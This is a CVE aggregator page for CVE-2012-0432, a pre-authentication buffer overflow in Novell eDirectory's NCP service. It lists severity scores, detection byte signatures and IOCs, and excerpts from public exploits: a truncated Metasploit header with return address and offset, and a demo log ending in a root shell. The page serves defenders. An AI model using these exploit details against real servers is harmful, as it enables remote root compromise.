CVE-2012-0432
published 2012-12-25CVE-2012-0432: Stack-based buffer overflow in the Novell NCP implementation in NetIQ eDirectory 8.8.7.x before 8.8.7.2 allows remote attackers to have an unspecified impact…
PriorityP268critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
58.70%
99.0th percentile
Stack-based buffer overflow in the Novell NCP implementation in NetIQ eDirectory 8.8.7.x before 8.8.7.2 allows remote attackers to have an unspecified impact via unknown vectors.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microfocus | edirectory | — | — |
| microfocus | edirectory | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
44 6d 64 54 00 00 00 17 00 00 00 01 00 00 00 00 11 11 00 00 00 00 00
bytes↗
44 6d 64 54 ... 22 22 01 ff 00 00 17 00 a7 18 90 90 50
bytes↗
74 4e 63 50 00 00 00 10 33 33
- →Detect NCP service connection requests on TCP port 524 containing the magic byte sequence 0x44 0x6d 0x64 0x54 (NCP TCP id) followed by a Keyed Object Login request (FunctionCode 0x17, SubFunctionCode 0x18) with an oversized ClientNameLen field (0x50) — indicative of the exploit trigger. ↗
- →Alert on NCP TCP responses containing the 'service connection reply' marker bytes 0x74 0x4e 0x63 0x50 followed by 0x33 0x33 on TCP port 524, which the exploit validates before sending the overflow payload. ↗
- →Monitor for unexpected outbound or inbound TCP connections on port 5074 from the eDirectory/ndsd host, which is the bind-shell port spawned by the exploit payload. ↗
- →Detect NCP request packets on TCP/524 where the total packet length field (bytes 4-7) is 0x000001a0 (416 bytes) or larger combined with FunctionCode 0x17 and SubFunctionCode 0x18, indicating a malformed/oversized Keyed Object Login request. ↗
- →Look for NOP sled patterns (0x90 sequences) within NCP payloads on TCP/524 as the exploit fills the overflow buffer with 0x90 (NOP) bytes before the shellcode. ↗
- ·The Metasploit module targets specifically 'Novell eDirectory 8.8.7 v20701.33 / SLES 10 SP3' with Ret=0x080a4697 and Offset=58; other patch levels use different offsets. ↗
- ·The vulnerability is fixed in eDirectory 8.8 SP7 Patch 2 (build 20703.00); systems running that version or later are not affected. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Novell eDirectory 8 - Remote Buffer Overflow (Metasploit)
exploitdb·2013-01-24
CVE-2012-0432 Novell eDirectory 8 - Remote Buffer Overflow (Metasploit)
Novell eDirectory 8 - Remote Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Novell eDirectory 8 Buffer Overflow',
'Description' => %q{
This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The
vulnerability exists in the ndsd daemon, specifically in the NCP service, while
parsing a specially crafted Keyed Object Login request. It allows remote code
execution with root privileges.
},
'Author' =>
[
'David Klein', # Vulnerability Discovery
'Gary Nilson', # Exploit
'juan vazquez' # Metasploit mo
Exploit-DB
Novell NCP - Remote Command Execution
exploitdb·2013-01-18·CVSS 10.0
CVE-2012-0432 [CRITICAL] Novell NCP - Remote Command Execution
Novell NCP - Remote Command Execution
---
In the interest of full-disclosure, here is a remote exploit for the
vulnerability found by David Klein:
Demonstration
Novell NCP Pre-Auth Remote Stack Buffer Overflow
Connecting to host [127.0.0.1]...
Connected!
Sending message #1 (23 bytes)
74 4e 63 50 00 00 00 10 33 33 00 0a 00 00 00 00
Response #1 is valid, continue exploitation
Received response connection number 0a
Sending payload (190 bytes)...
[...omitted...]
190 bytes sent
Attempting to connect to shell at port 5074...
Sleeping for 10 seconds...
Success!
pwd
/var/opt/novell/instance0/data/dib
id
uid=0(root) gid=0(root) groups=0(root)
exit
Connection closed
********** BEGIN EXPLOIT **********
/*
* Novell NCP Pre-Auth Remote Root Exploit
* Written by Gary Nilson 11-17-2013
*
* Overv
Metasploit
Novell eDirectory 8 Buffer Overflow
metasploit
Novell eDirectory 8 Buffer Overflow
Novell eDirectory 8 Buffer Overflow
This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The vulnerability exists in the ndsd daemon, specifically in the NCP service, while parsing a specially crafted Keyed Object Login request. It allows remote code execution with root privileges.
No writeups or analysis indexed.
2012-12-25
Published